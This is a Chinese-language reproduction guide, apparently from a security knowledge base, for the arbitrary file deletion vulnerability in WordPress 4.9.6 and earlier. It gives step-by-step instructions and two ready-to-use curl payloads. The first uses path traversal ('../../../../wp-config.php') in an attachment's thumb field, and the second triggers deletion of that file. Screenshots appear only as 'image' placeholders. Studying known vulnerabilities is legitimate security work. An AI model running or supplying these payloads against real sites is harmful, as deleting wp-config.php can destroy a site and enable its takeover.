Wordpress <= 4.9.6 任意文件删除漏洞

一、漏洞简介

利用条件L:需要进入后台

二、漏洞影响

三、复现过程

添加新媒体

访问http://0-sec.org/wp-admin/upload.php,然后上传图片。

image

将$ meta ['thumb']设置为我们要删除的文件

单击我们在中上传的图像Step 2,并记住图像的ID。

image

访问http://0-sec.org/wp-admin/post.php?post=4&action=edit._wpnonce在页面源中查找

image

发送有效载荷:

curl -v 'http://0-sec.org/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

image

发动攻击

在页面源码中查找 _wpnonce

image

发送有效载荷

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'

image

刷新页面

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-23 00:16:22

results matching ""

    No results matching ""